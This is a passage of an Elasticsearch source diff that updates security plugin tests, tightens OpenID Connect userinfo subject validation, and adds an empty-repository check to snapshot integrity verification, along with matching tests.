a/x-pack/plugin/security/qa/microsoft-graph-authz-tests/src/javaRestTest/java/org/elasticsearch/xpack/security/authz/microsoft/MicrosoftGraphAuthzPluginIT.java b/x-pack/plugin/security/qa/microsoft-graph-authz-tests/src/javaRestTest/java/org/elasticsearch/xpack/security/authz/microsoft/MicrosoftGraphAuthzPluginIT.java index d003e9dec9c4a..fad71a4348aa5 100644 --- a/x-pack/plugin/security/qa/microsoft-graph-authz-tests/src/javaRestTest/java/org/elasticsearch/xpack/security/authz/microsoft/MicrosoftGraphAuthzPluginIT.java +++ b/x-pack/plugin/security/qa/microsoft-graph-authz-tests/src/javaRestTest/java/org/elasticsearch/xpack/security/authz/microsoft/MicrosoftGraphAuthzPluginIT.java @@ -17,6 +17,7 @@ import org.elasticsearch.common.settings.SecureString; import org.elasticsearch.common.settings.Settings; import org.elasticsearch.common.util.concurrent.ThreadContext; +import org.elasticsearch.core.Booleans; import org.elasticsearch.core.PathUtils; import org.elasticsearch.test.TestTrustStore; import org.elasticsearch.test.XContentTestUtils; @@ -51,11 +52,12 @@ public class MicrosoftGraphAuthzPluginIT extends ESRestTestCase { - private static final String TENANT_ID = "tenant-id"; - private static final String CLIENT_ID = "client_id"; - private static final String CLIENT_SECRET = "client_secret"; - private static final String USERNAME = "Thor"; - private static final String EXPECTED_GROUP = "test_group"; + private static final String TENANT_ID = System.getProperty("test.ms_graph.tenant_id"); + private static final String CLIENT_ID = System.getProperty("test.ms_graph.client_id"); + private static final String CLIENT_SECRET = System.getProperty("test.ms_graph.client_secret"); + private static final String USERNAME = System.getProperty("test.ms_graph.username"); + private static final String EXPECTED_GROUP = System.getProperty("test.ms_graph.group_id"); + private static final Boolean USE_FIXTURE = Booleans.parseBoolean(System.getProperty("test.ms_graph.fixture")); private static final List TEST_USERS = List.of( new MicrosoftGraphHttpFixture.TestUser( @@ -90,12 +92,14 @@ public class MicrosoftGraphAuthzPluginIT extends ESRestTestCase { ); @ClassRule - public static TestRule ruleChain = RuleChain.outerRule(graphFixture).around(trustStore).around(cluster); + public static TestRule ruleChain = USE_FIXTURE + ? RuleChain.outerRule(graphFixture).around(trustStore).around(cluster) + : RuleChain.outerRule(cluster); private static final String IDP_ENTITY_ID = "http://idp.example.org/"; private static ElasticsearchCluster initTestCluster() { - return ElasticsearchCluster.local() + final var clusterBuilder = ElasticsearchCluster.local() .module("analysis-common") .setting("xpack.security.enabled", "true") .setting("xpack.license.self_generated.type", "trial") @@ -118,15 +122,22 @@ private static ElasticsearchCluster initTestCluster() { .setting("xpack.security.authc.realms.microsoft_graph.microsoft_graph1.client_id", CLIENT_ID) .keystore("xpack.security.authc.realms.microsoft_graph.microsoft_graph1.client_secret", CLIENT_SECRET) .setting("xpack.security.authc.realms.microsoft_graph.microsoft_graph1.tenant_id", TENANT_ID) - .setting("xpack.security.authc.realms.microsoft_graph.microsoft_graph1.graph_host", () -> graphFixture.getBaseUrl() + "/v1.0") - .setting("xpack.security.authc.realms.microsoft_graph.microsoft_graph1.access_token_host", graphFixture::getBaseUrl) .setting("logger.org.elasticsearch.xpack.security.authz.microsoft", "TRACE") .setting("logger.com.microsoft", "TRACE") - .setting("logger.com.azure", "TRACE") - .systemProperty("javax.net.ssl.trustStore", () -> trustStore.getTrustStorePath().toString()) - .systemProperty("javax.net.ssl.trustStoreType", "jks") - .systemProperty("tests.azure.credentials.disable_instance_discovery", "true") - .build(); + .setting("logger.com.azure", "TRACE"); + + if (USE_FIXTURE) { + clusterBuilder.setting( + "xpack.security.authc.realms.microsoft_graph.microsoft_graph1.graph_host", + () -> graphFixture.getBaseUrl() + "/v1.0" + ) + .setting("xpack.security.authc.realms.microsoft_graph.microsoft_graph1.access_token_host", graphFixture::getBaseUrl) + .systemProperty("javax.net.ssl.trustStore", () -> trustStore.getTrustStorePath().toString()) + .systemProperty("javax.net.ssl.trustStoreType", "jks") + .systemProperty("tests.azure.credentials.disable_instance_discovery", "true"); + } + + return clusterBuilder.build(); } private static String getIDPMetadata() { @@ -210,6 +221,7 @@ public void testAuthenticationSuccessful() throws Exception { } public void testConcurrentAuthentication() throws Exception { + assumeTrue("This needs the test server as the real account only has one user configured", USE_FIXTURE); final var concurrentLogins = 3; final var resultsListener = new PlainActionFuture>>(); diff --git a/x-pack/plugin/security/qa/multi-cluster/src/javaRestTest/java/org/elasticsearch/xpack/remotecluster/RemoteClusterSecurityEsqlIT.java b/x-pack/plugin/security/qa/multi-cluster/src/javaRestTest/java/org/elasticsearch/xpack/remotecluster/RemoteClusterSecurityEsqlIT.java index 226dc14d37158..2c545b54b37ef 100644 --- a/x-pack/plugin/security/qa/multi-cluster/src/javaRestTest/java/org/elasticsearch/xpack/remotecluster/RemoteClusterSecurityEsqlIT.java +++ b/x-pack/plugin/security/qa/multi-cluster/src/javaRestTest/java/org/elasticsearch/xpack/remotecluster/RemoteClusterSecurityEsqlIT.java @@ -848,18 +848,18 @@ public void testCrossClusterEnrichWithOnlyRemotePrivs() throws Exception { | ENRICH countries | STATS size=count(*) by country | SORT size DESC - | LIMIT 2""")); + | LIMIT 3""")); assertOK(response); Map responseAsMap = entityAsMap(response); List columns = (List) responseAsMap.get("columns"); List values = (List) responseAsMap.get("values"); assertEquals(2, columns.size()); - assertEquals(2, values.size()); + assertEquals(3, values.size()); List flatList = values.stream() .flatMap(innerList -> innerList instanceof List ? ((List) innerList).stream() : Stream.empty()) .collect(Collectors.toList()); - assertThat(flatList, containsInAnyOrder(1, 3, "usa", "germany")); + assertThat(flatList, containsInAnyOrder(1, 1, 3, "usa", "germany", "japan")); } private void createAliases() throws Exception { diff --git a/x-pack/plugin/security/qa/operator-privileges-tests/src/javaRestTest/java/org/elasticsearch/xpack/security/operator/Constants.java b/x-pack/plugin/security/qa/operator-privileges-tests/src/javaRestTest/java/org/elasticsearch/xpack/security/operator/Constants.java index 881ab821e62f6..fd576bff413a0 100644 --- a/x-pack/plugin/security/qa/operator-privileges-tests/src/javaRestTest/java/org/elasticsearch/xpack/security/operator/Constants.java +++ b/x-pack/plugin/security/qa/operator-privileges-tests/src/javaRestTest/java/org/elasticsearch/xpack/security/operator/Constants.java @@ -73,7 +73,6 @@ public class Constants { "cluster:admin/scripts/painless/context", "cluster:admin/scripts/painless/execute", "cluster:admin/streams/logs/toggle", - "cluster:admin/streams/status", "cluster:admin/synonyms/delete", "cluster:admin/synonyms/get", "cluster:admin/synonyms/put", @@ -373,6 +372,7 @@ public class Constants { "cluster:monitor/settings", "cluster:monitor/state", "cluster:monitor/stats", + "cluster:monitor/streams/status", "cluster:monitor/task", "cluster:monitor/task/get", "cluster:monitor/tasks/lists", diff --git a/x-pack/plugin/security/src/internalClusterTest/java/org/elasticsearch/test/SecuritySingleNodeTestCase.java b/x-pack/plugin/security/src/internalClusterTest/java/org/elasticsearch/test/SecuritySingleNodeTestCase.java index 3d640cd962c19..5de501e42d1f2 100644 --- a/x-pack/plugin/security/src/internalClusterTest/java/org/elasticsearch/test/SecuritySingleNodeTestCase.java +++ b/x-pack/plugin/security/src/internalClusterTest/java/org/elasticsearch/test/SecuritySingleNodeTestCase.java @@ -69,6 +69,7 @@ * {@link SecurityIntegTestCase} due to simplicity and improved speed from not needing to start * multiple nodes and wait for the cluster to form. */ +@ESTestCase.WithoutEntitlements // requires entitlement delegation ES-12382 public abstract class SecuritySingleNodeTestCase extends ESSingleNodeTestCase { private static SecuritySettingsSource SECURITY_DEFAULT_SETTINGS = null; diff --git a/x-pack/plugin/security/src/main/java/module-info.java b/x-pack/plugin/security/src/main/java/module-info.java index 80986de66d89a..88b421e1efe31 100644 --- a/x-pack/plugin/security/src/main/java/module-info.java +++ b/x-pack/plugin/security/src/main/java/module-info.java @@ -25,7 +25,6 @@ requires org.apache.httpcomponents.httpclient; requires org.apache.httpcomponents.httpasyncclient; requires org.apache.httpcomponents.httpcore.nio; - requires org.apache.log4j; requires org.apache.logging.log4j; requires org.apache.logging.log4j.core; requires org.apache.lucene.core; diff --git a/x-pack/plugin/security/src/main/java/org/elasticsearch/xpack/security/Security.java b/x-pack/plugin/security/src/main/java/org/elasticsearch/xpack/security/Security.java index 740c11ea97306..dad6fddef371d 100644 --- a/x-pack/plugin/security/src/main/java/org/elasticsearch/xpack/security/Security.java +++ b/x-pack/plugin/security/src/main/java/org/elasticsearch/xpack/security/Security.java @@ -956,7 +956,7 @@ Collection createComponents( components.add(privilegeStore); final ReservedRolesStore reservedRolesStore = new ReservedRolesStore(Set.copyOf(INCLUDED_RESERVED_ROLES_SETTING.get(settings))); - dlsBitsetCache.set(new DocumentSubsetBitsetCache(settings, threadPool)); + dlsBitsetCache.set(new DocumentSubsetBitsetCache(settings)); final FieldPermissionsCache fieldPermissionsCache = new FieldPermissionsCache(settings); RoleDescriptor.setFieldPermissionsCache(fieldPermissionsCache); diff --git a/x-pack/plugin/security/src/main/java/org/elasticsearch/xpack/security/authc/oidc/OpenIdConnectAuthenticator.java b/x-pack/plugin/security/src/main/java/org/elasticsearch/xpack/security/authc/oidc/OpenIdConnectAuthenticator.java index 8d02992c2ec3a..4bf93fc10e96c 100644 --- a/x-pack/plugin/security/src/main/java/org/elasticsearch/xpack/security/authc/oidc/OpenIdConnectAuthenticator.java +++ b/x-pack/plugin/security/src/main/java/org/elasticsearch/xpack/security/authc/oidc/OpenIdConnectAuthenticator.java @@ -477,7 +477,20 @@ static void handleUserinfoResponse( if (httpResponse.getStatusLine().getStatusCode() == 200) { if (ContentType.parse(contentHeader.getValue()).getMimeType().equals("application/json")) { final JWTClaimsSet userInfoClaims = JWTClaimsSet.parse(contentAsString); - validateUserInfoResponse(userInfoClaims, verifiedIdTokenClaims.getSubject(), claimsListener); + String expectedSub = verifiedIdTokenClaims.getSubject(); + if (userInfoClaims.getSubject() == null || userInfoClaims.getSubject().isEmpty()) { + claimsListener.onFailure(new ElasticsearchSecurityException("Userinfo Response did not contain a sub Claim")); + return; + } else if (userInfoClaims.getSubject().equals(expectedSub) == false) { + claimsListener.onFailure( + new ElasticsearchSecurityException( + "Userinfo Response is not valid as it is for " + "subject [{}] while the ID Token was for subject [{}]", + userInfoClaims.getSubject(), + expectedSub + ) + ); + return; + } if (LOGGER.isTraceEnabled()) { LOGGER.trace("Successfully retrieved user information: [{}]", userInfoClaims); } @@ -527,27 +540,6 @@ static void handleUserinfoResponse( } } - /** - * Validates that the userinfo response contains a sub Claim and that this claim value is the same as the one returned in the ID Token - */ - private static void validateUserInfoResponse( - JWTClaimsSet userInfoClaims, - String expectedSub, - ActionListener claimsListener - ) { - if (userInfoClaims.getSubject().isEmpty()) { - claimsListener.onFailure(new ElasticsearchSecurityException("Userinfo Response did not contain a sub Claim")); - } else if (userInfoClaims.getSubject().equals(expectedSub) == false) { - claimsListener.onFailure( - new ElasticsearchSecurityException( - "Userinfo Response is not valid as it is for " + "subject [{}] while the ID Token was for subject [{}]", - userInfoClaims.getSubject(), - expectedSub - ) - ); - } - } - /** * Attempts to make a request to the Token Endpoint of the OpenID Connect provider in order to exchange an * authorization code for an Id Token (and potentially an Access Token) diff --git a/x-pack/plugin/security/src/test/java/org/elasticsearch/test/SecurityIntegTestCase.java b/x-pack/plugin/security/src/test/java/org/elasticsearch/test/SecurityIntegTestCase.java index d59dc56d15686..24b0caab73186 100644 --- a/x-pack/plugin/security/src/test/java/org/elasticsearch/test/SecurityIntegTestCase.java +++ b/x-pack/plugin/security/src/test/java/org/elasticsearch/test/SecurityIntegTestCase.java @@ -60,6 +60,7 @@ * * @see SecuritySettingsSource */ +@ESTestCase.WithoutEntitlements // requires entitlement delegation ES-12382 public abstract class SecurityIntegTestCase extends ESIntegTestCase { private static SecuritySettingsSource SECURITY_DEFAULT_SETTINGS; diff --git a/x-pack/plugin/security/src/test/java/org/elasticsearch/xpack/security/authc/AuthenticationServiceTests.java b/x-pack/plugin/security/src/test/java/org/elasticsearch/xpack/security/authc/AuthenticationServiceTests.java index d0a9ee9d78a43..581da4e4dd016 100644 --- a/x-pack/plugin/security/src/test/java/org/elasticsearch/xpack/security/authc/AuthenticationServiceTests.java +++ b/x-pack/plugin/security/src/test/java/org/elasticsearch/xpack/security/authc/AuthenticationServiceTests.java @@ -1980,6 +1980,11 @@ public void testInvalidToken() throws Exception { when(projectIndex.getUnavailableReason(any())).thenReturn(new ElasticsearchException(getTestName())); } else { when(projectIndex.isAvailable(any())).thenReturn(true); + doAnswer(invocationOnMock -> { + Runnable runnable = (Runnable) invocationOnMock.getArguments()[1]; + runnable.run(); + return null; + }).when(projectIndex).checkIndexVersionThenExecute(anyConsumer(), any(Runnable.class)); doAnswer(inv -> { final GetRequest request = inv.getArgument(0); final ActionListener listener = inv.getArgument(1); diff --git a/x-pack/plugin/security/src/test/java/org/elasticsearch/xpack/security/authc/ldap/ActiveDirectoryRealmTests.java b/x-pack/plugin/security/src/test/java/org/elasticsearch/xpack/security/authc/ldap/ActiveDirectoryRealmTests.java index 1ff7ef10d348d..f6c98a467205e 100644 --- a/x-pack/plugin/security/src/test/java/org/elasticsearch/xpack/security/authc/ldap/ActiveDirectoryRealmTests.java +++ b/x-pack/plugin/security/src/test/java/org/elasticsearch/xpack/security/authc/ldap/ActiveDirectoryRealmTests.java @@ -33,6 +33,7 @@ import org.elasticsearch.script.ScriptService; import org.elasticsearch.script.mustache.MustacheScriptEngine; import org.elasticsearch.test.ESTestCase; +import org.elasticsearch.test.ESTestCase.EntitledTestPackages; import org.elasticsearch.threadpool.TestThreadPool; import org.elasticsearch.threadpool.ThreadPool; import org.elasticsearch.watcher.ResourceWatcherService; @@ -106,6 +107,7 @@ * The username used to authenticate then has to be in the form of CN=user. Finally the username needs to be added as an * additional bind DN with a password in the test setup since it really is not a DN in the ldif file */ +@EntitledTestPackages(value = { "com.unboundid.ldap.listener" }) // tests start LDAP server that listens for incoming connections public class ActiveDirectoryRealmTests extends ESTestCase { private static final String PASSWORD = "password"; diff --git a/x-pack/plugin/security/src/test/java/org/elasticsearch/xpack/security/authc/ldap/support/LdapTestCase.java b/x-pack/plugin/security/src/test/java/org/elasticsearch/xpack/security/authc/ldap/support/LdapTestCase.java index 769491742ad5d..18741b5a13a99 100644 --- a/x-pack/plugin/security/src/test/java/org/elasticsearch/xpack/security/authc/ldap/support/LdapTestCase.java +++ b/x-pack/plugin/security/src/test/java/org/elasticsearch/xpack/security/authc/ldap/support/LdapTestCase.java @@ -29,6 +29,7 @@ import org.elasticsearch.core.TimeValue; import org.elasticsearch.env.TestEnvironment; import org.elasticsearch.test.ESTestCase; +import org.elasticsearch.test.ESTestCase.EntitledTestPackages; import org.elasticsearch.watcher.ResourceWatcherService; import org.elasticsearch.xpack.core.XPackSettings; import org.elasticsearch.xpack.core.security.authc.RealmConfig; @@ -73,6 +74,7 @@ import static org.elasticsearch.xpack.core.security.authc.ldap.support.SessionFactorySettings.URLS_SETTING; import static org.hamcrest.Matchers.is; +@EntitledTestPackages(value = { "com.unboundid.ldap.listener" }) // tests start LDAP server that listens for incoming connections public abstract class LdapTestCase extends ESTestCase { protected static final RealmConfig.RealmIdentifier REALM_IDENTIFIER = new RealmConfig.RealmIdentifier("ldap", "ldap1"); diff --git a/x-pack/plugin/security/src/test/java/org/elasticsearch/xpack/security/authc/oidc/OpenIdConnectAuthenticatorTests.java b/x-pack/plugin/security/src/test/java/org/elasticsearch/xpack/security/authc/oidc/OpenIdConnectAuthenticatorTests.java index 76069ce500ad9..ebf98b035f7d6 100644 --- a/x-pack/plugin/security/src/test/java/org/elasticsearch/xpack/security/authc/oidc/OpenIdConnectAuthenticatorTests.java +++ b/x-pack/plugin/security/src/test/java/org/elasticsearch/xpack/security/authc/oidc/OpenIdConnectAuthenticatorTests.java @@ -108,6 +108,7 @@ import java.util.Map; import java.util.UUID; import java.util.concurrent.CountDownLatch; +import java.util.concurrent.atomic.AtomicBoolean; import java.util.concurrent.atomic.AtomicReference; import javax.crypto.SecretKey; @@ -968,6 +969,53 @@ public void testHandleUserinfoResponseFailure() throws Exception { ); } + public void testHandleUserinfoValidationFailsOnNotMatchingSubject() throws Exception { + final ProtocolVersion httpVersion = randomFrom(HttpVersion.HTTP_0_9, HttpVersion.HTTP_1_0, HttpVersion.HTTP_1_1); + final HttpResponse response = new BasicHttpResponse(new BasicStatusLine(httpVersion, RestStatus.OK.getStatus(), "OK")); + + final String sub = randomAlphaOfLengthBetween(4, 36); + final String inf = randomAlphaOfLength(12); + final JWTClaimsSet infoClaims = new JWTClaimsSet.Builder().subject("it-is-a-different-subject").claim("inf", inf).build(); + final StringEntity entity = new StringEntity(infoClaims.toString(), ContentType.APPLICATION_JSON); + if (randomBoolean()) { + entity.setContentEncoding( + randomFrom(StandardCharsets.UTF_8.name(), StandardCharsets.UTF_16.name(), StandardCharsets.US_ASCII.name()) + ); + } + response.setEntity(entity); + + final String idx = randomAlphaOfLength(8); + final JWTClaimsSet idClaims = new JWTClaimsSet.Builder().subject(sub).claim("idx", idx).build(); + final AtomicBoolean listenerCalled = new AtomicBoolean(false); + final PlainActionFuture future = new PlainActionFuture<>() { + + @Override + public void onResponse(JWTClaimsSet result) { + assertTrue("listener called more than once", listenerCalled.compareAndSet(false, true)); + super.onResponse(result); + } + + @Override + public void onFailure(Exception e) { + assertTrue("listener called more than once", listenerCalled.compareAndSet(false, true)); + super.onFailure(e); + } + }; + + this.authenticator = buildAuthenticator(); + OpenIdConnectAuthenticator.handleUserinfoResponse(response, idClaims, future); + var e = expectThrows(ElasticsearchSecurityException.class, future::actionGet); + + assertThat( + e.getMessage(), + equalTo( + "Userinfo Response is not valid as it is for subject [it-is-a-different-subject] while the ID Token was for subject [" + + sub + + "]" + ) + ); + } + public void testHandleTokenResponseNullContentType() { final HttpResponse response = new BasicHttpResponse(HttpVersion.HTTP_1_1, RestStatus.OK.getStatus(), ""); final StringEntity entity = new StringEntity("", (ContentType) null); diff --git a/x-pack/plugin/security/src/test/java/org/elasticsearch/xpack/security/authz/IndicesAndAliasesResolverTests.java b/x-pack/plugin/security/src/test/java/org/elasticsearch/xpack/security/authz/IndicesAndAliasesResolverTests.java index cb6db57ee5558..54e10ddcf3139 100644 --- a/x-pack/plugin/security/src/test/java/org/elasticsearch/xpack/security/authz/IndicesAndAliasesResolverTests.java +++ b/x-pack/plugin/security/src/test/java/org/elasticsearch/xpack/security/authz/IndicesAndAliasesResolverTests.java @@ -61,7 +61,6 @@ import org.elasticsearch.protocol.xpack.graph.GraphExploreRequest; import org.elasticsearch.search.internal.ShardSearchRequest; import org.elasticsearch.test.ESTestCase; -import org.elasticsearch.threadpool.ThreadPool; import org.elasticsearch.transport.EmptyRequest; import org.elasticsearch.transport.NoSuchRemoteClusterException; import org.elasticsearch.transport.TransportRequest; @@ -255,7 +254,7 @@ public void setup() { mock(ApiKeyService.class), mock(ServiceAccountService.class), TestProjectResolvers.DEFAULT_PROJECT_ONLY, - new DocumentSubsetBitsetCache(Settings.EMPTY, mock(ThreadPool.class)), + new DocumentSubsetBitsetCache(Settings.EMPTY), RESTRICTED_INDICES, EsExecutors.DIRECT_EXECUTOR_SERVICE, rds -> {} diff --git a/x-pack/plugin/security/src/test/java/org/elasticsearch/xpack/security/authz/store/CompositeRolesStoreTests.java b/x-pack/plugin/security/src/test/java/org/elasticsearch/xpack/security/authz/store/CompositeRolesStoreTests.java index 5615c5dd8ddf0..3279988567ddf 100644 --- a/x-pack/plugin/security/src/test/java/org/elasticsearch/xpack/security/authz/store/CompositeRolesStoreTests.java +++ b/x-pack/plugin/security/src/test/java/org/elasticsearch/xpack/security/authz/store/CompositeRolesStoreTests.java @@ -3861,7 +3861,7 @@ private RoleProviders buildRolesProvider( } private DocumentSubsetBitsetCache buildBitsetCache() { - return new DocumentSubsetBitsetCache(Settings.EMPTY, mock(ThreadPool.class)); + return new DocumentSubsetBitsetCache(Settings.EMPTY); } private static class InMemoryRolesProvider implements BiConsumer, ActionListener> { diff --git a/x-pack/plugin/security/src/test/java/org/elasticsearch/xpack/security/transport/netty4/SecurityNetty4HeaderSizeLimitTests.java b/x-pack/plugin/security/src/test/java/org/elasticsearch/xpack/security/transport/netty4/SecurityNetty4HeaderSizeLimitTests.java index eafd825376d66..45a4f4f0dcdca 100644 --- a/x-pack/plugin/security/src/test/java/org/elasticsearch/xpack/security/transport/netty4/SecurityNetty4HeaderSizeLimitTests.java +++ b/x-pack/plugin/security/src/test/java/org/elasticsearch/xpack/security/transport/netty4/SecurityNetty4HeaderSizeLimitTests.java @@ -24,7 +24,6 @@ import org.elasticsearch.mocksocket.MockSocket; import org.elasticsearch.tasks.TaskManager; import org.elasticsearch.telemetry.metric.MeterRegistry; -import org.elasticsearch.telemetry.tracing.Tracer; import org.elasticsearch.test.ESTestCase; import org.elasticsearch.threadpool.DefaultBuiltInExecutorBuilders; import org.elasticsearch.threadpool.ThreadPool; @@ -111,8 +110,7 @@ public void onRequestReceived(long requestId, String action) { (request, channel, task) -> channel.sendResponse(ActionResponse.Empty.INSTANCE), EsExecutors.DIRECT_EXECUTOR_SERVICE, false, - true, - Tracer.NOOP + true ) ); securityNettyTransport.start(); diff --git a/x-pack/plugin/security/src/test/java/org/elasticsearch/xpack/security/transport/netty4/SimpleSecurityNetty4ServerTransportTests.java b/x-pack/plugin/security/src/test/java/org/elasticsearch/xpack/security/transport/netty4/SimpleSecurityNetty4ServerTransportTests.java index b984295155c1f..a27e9a1cbda8f 100644 --- a/x-pack/plugin/security/src/test/java/org/elasticsearch/xpack/security/transport/netty4/SimpleSecurityNetty4ServerTransportTests.java +++ b/x-pack/plugin/security/src/test/java/org/elasticsearch/xpack/security/transport/netty4/SimpleSecurityNetty4ServerTransportTests.java @@ -14,7 +14,6 @@ import org.apache.lucene.util.Constants; import org.elasticsearch.ExceptionsHelper; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.action.ActionListener; import org.elasticsearch.action.support.PlainActionFuture; import org.elasticsearch.action.support.TestPlainActionFuture; @@ -1059,7 +1058,7 @@ public void executeHandshake( super.executeHandshake(node, channel, profile, listener); } else { assert version.equals(TransportVersion.current()); - listener.onResponse(TransportVersions.MINIMUM_COMPATIBLE); + listener.onResponse(TransportVersion.minimumCompatible()); } } diff --git a/x-pack/plugin/security/src/test/java/org/elasticsearch/xpack/ssl/SSLErrorMessageFileTests.java b/x-pack/plugin/security/src/test/java/org/elasticsearch/xpack/ssl/SSLErrorMessageFileTests.java index 4f64b780e1f97..2ac2d4ebf0c32 100644 --- a/x-pack/plugin/security/src/test/java/org/elasticsearch/xpack/ssl/SSLErrorMessageFileTests.java +++ b/x-pack/plugin/security/src/test/java/org/elasticsearch/xpack/ssl/SSLErrorMessageFileTests.java @@ -16,7 +16,6 @@ import org.elasticsearch.core.PathUtils; import org.elasticsearch.env.Environment; import org.elasticsearch.env.TestEnvironment; -import org.elasticsearch.jdk.RuntimeVersionFeature; import org.elasticsearch.test.ESTestCase; import org.elasticsearch.xpack.core.ssl.SSLService; import org.junit.Before; @@ -363,11 +362,6 @@ private void checkBlockedResource( String configKey, BiConsumer configure ) throws Exception { - assumeTrue( - "Requires Security Manager to block access, entitlements are not checked for unit tests", - RuntimeVersionFeature.isSecurityManagerAvailable() - ); - final String prefix = randomSslPrefix(); final Settings.Builder settings = Settings.builder(); configure.accept(prefix, settings); diff --git a/x-pack/plugin/snapshot-repo-test-kit/qa/minio/src/javaRestTest/java/org/elasticsearch/repositories/blobstore/testkit/analyze/MinioRepositoryAnalysisRestIT.java b/x-pack/plugin/snapshot-repo-test-kit/qa/minio/src/javaRestTest/java/org/elasticsearch/repositories/blobstore/testkit/analyze/MinioRepositoryAnalysisRestIT.java index 0929561909963..bb03585a8fdfe 100644 --- a/x-pack/plugin/snapshot-repo-test-kit/qa/minio/src/javaRestTest/java/org/elasticsearch/repositories/blobstore/testkit/analyze/MinioRepositoryAnalysisRestIT.java +++ b/x-pack/plugin/snapshot-repo-test-kit/qa/minio/src/javaRestTest/java/org/elasticsearch/repositories/blobstore/testkit/analyze/MinioRepositoryAnalysisRestIT.java @@ -33,6 +33,11 @@ public class MinioRepositoryAnalysisRestIT extends AbstractRepositoryAnalysisRes .keystore("s3.client.repository_test_kit.secret_key", "s3_test_secret_key") .setting("s3.client.repository_test_kit.endpoint", minioFixture::getAddress) .setting("xpack.security.enabled", "false") + // Skip listing of pre-existing uploads during a CAS because MinIO sometimes leaks them; also reduce the delay before proceeding + // TODO do not set these if running a MinIO version in which https://github.com/minio/minio/issues/21189 + // and https://github.com/minio/minio/issues/21456 are both fixed + .setting("repository_s3.compare_and_exchange.time_to_live", "-1") + .setting("repository_s3.compare_and_exchange.anti_contention_delay", "100ms") .setting("xpack.ml.enabled", "false") .build(); diff --git a/x-pack/plugin/snapshot-repo-test-kit/src/internalClusterTest/java/org/elasticsearch/repositories/blobstore/testkit/integrity/RepositoryVerifyIntegrityIT.java b/x-pack/plugin/snapshot-repo-test-kit/src/internalClusterTest/java/org/elasticsearch/repositories/blobstore/testkit/integrity/RepositoryVerifyIntegrityIT.java index 298dcd9ed94c5..e446a5000b7bb 100644 --- a/x-pack/plugin/snapshot-repo-test-kit/src/internalClusterTest/java/org/elasticsearch/repositories/blobstore/testkit/integrity/RepositoryVerifyIntegrityIT.java +++ b/x-pack/plugin/snapshot-repo-test-kit/src/internalClusterTest/java/org/elasticsearch/repositories/blobstore/testkit/integrity/RepositoryVerifyIntegrityIT.java @@ -14,6 +14,7 @@ import org.elasticsearch.action.support.SubscribableListener; import org.elasticsearch.client.Request; import org.elasticsearch.client.Response; +import org.elasticsearch.client.ResponseException; import org.elasticsearch.common.bytes.BytesReference; import org.elasticsearch.common.settings.Settings; import org.elasticsearch.common.unit.ByteSizeValue; @@ -35,6 +36,7 @@ import org.elasticsearch.repositories.blobstore.RepositoryFileType; import org.elasticsearch.repositories.blobstore.testkit.SnapshotRepositoryTestKit; import org.elasticsearch.repositories.fs.FsRepository; +import org.elasticsearch.rest.RestStatus; import org.elasticsearch.snapshots.AbstractSnapshotIntegTestCase; import org.elasticsearch.snapshots.SnapshotId; import org.elasticsearch.snapshots.SnapshotInfo; @@ -73,6 +75,7 @@ import static org.elasticsearch.repositories.blobstore.BlobStoreRepository.SNAPSHOT_FORMAT; import static org.elasticsearch.test.hamcrest.ElasticsearchAssertions.assertAcked; import static org.hamcrest.Matchers.allOf; +import static org.hamcrest.Matchers.containsString; import static org.hamcrest.Matchers.empty; import static org.hamcrest.Matchers.equalTo; import static org.hamcrest.Matchers.greaterThanOrEqualTo; @@ -713,6 +716,21 @@ public void testBlobInSnapshotNotShardGeneration() throws IOException { }, "blob in snapshot but not shard generation"); } + public void testFreshRepository() { + final var repositoryName = randomIdentifier(); + final var repositoryRootPath = randomRepoPath(); + + createRepository(repositoryName, FsRepository.TYPE, repositoryRootPath); + try { + final var request = new Request("POST", "/_snapshot/" + repositoryName + "/_verify_integrity"); + final var responseException = expectThrows(ResponseException.class, () -> getRestClient().performRequest(request)); + assertEquals(RestStatus.BAD_REQUEST.getStatus(), responseException.getResponse().getStatusLine().getStatusCode()); + assertThat(responseException.getMessage(), containsString("repository is empty, cannot verify its integrity")); + } finally { + deleteRepository(repositoryName); + } + } + private void runInconsistentShardGenerationBlobTest( TestContext testContext, UnaryOperator shardGenerationUpdater, diff --git a/x-pack/plugin/snapshot-repo-test-kit/src/main/java/org/elasticsearch/repositories/blobstore/testkit/integrity/TransportRepositoryVerifyIntegrityAction.java b/x-pack/plugin/snapshot-repo-test-kit/src/main/java/org/elasticsearch/repositories/blobstore/testkit/integrity/TransportRepositoryVerifyIntegrityAction.java index 57f77cb8441d7..b2cfd7e4f91bb 100644 --- a/x-pack/plugin/snapshot-repo-test-kit/src/main/java/org/elasticsearch/repositories/blobstore/testkit/integrity/TransportRepositoryVerifyIntegrityAction.java +++ b/x-pack/plugin/snapshot-repo-test-kit/src/main/java/org/elasticsearch/repositories/blobstore/testkit/integrity/TransportRepositoryVerifyIntegrityAction.java @@ -132,6 +132,7 @@ public void writeResponseChunk(RepositoryVerifyIntegrityResponseChunk responseCh .newForked(l -> repository.getRepositoryData(executor, l)) .andThenApply(repositoryData -> { + ensureValidGenId(repositoryData.getGenId()); final var cancellableThreads = new CancellableThreads(); task.addListener(() -> cancellableThreads.cancel("task cancelled")); final var verifier = new RepositoryIntegrityVerifier( @@ -155,4 +156,17 @@ public void writeResponseChunk(RepositoryVerifyIntegrityResponseChunk responseCh .andThen((l, repositoryIntegrityVerifier) -> repositoryIntegrityVerifier.start(l)) .addListener(listener); } + + static void ensureValidGenId(long repositoryGenId) { + if (repositoryGenId == RepositoryData.EMPTY_REPO_GEN) { + throw new IllegalArgumentException("repository is empty, cannot verify its integrity"); + } + if (repositoryGenId < 0) { + final var exception = new IllegalStateException( + "repository is in an unexpected state [" + repositoryGenId + "], cannot verify its integrity" + ); + assert false : exception; // cannot be unknown, and if corrupt we throw a corruptedStateException from getRepositoryData + throw exception; + } + } } diff --git a/x-pack/plugin/snapshot-repo-test-kit/src/test/java/org/elasticsearch/repositories/blobstore/testkit/analyze/AbstractRepositoryAnalysisRestTestCase.java b/x-pack/plugin/snapshot-repo-test-kit/src/test/java/org/elasticsearch/repositories/blobstore/testkit/analyze/AbstractRepositoryAnalysisRestTestCase.java index a971772975128..69ab919ec3392 100644 --- a/x-pack/plugin/snapshot-repo-test-kit/src/test/java/org/elasticsearch/repositories/blobstore/testkit/analyze/AbstractRepositoryAnalysisRestTestCase.java +++ b/x-pack/plugin/snapshot-repo-test-kit/src/test/java/org/elasticsearch/repositories/blobstore/testkit/analyze/AbstractRepositoryAnalysisRestTestCase.java @@ -7,9 +7,12 @@ package org.elasticsearch.repositories.blobstore.testkit.analyze; +import org.apache.http.client.config.RequestConfig; import 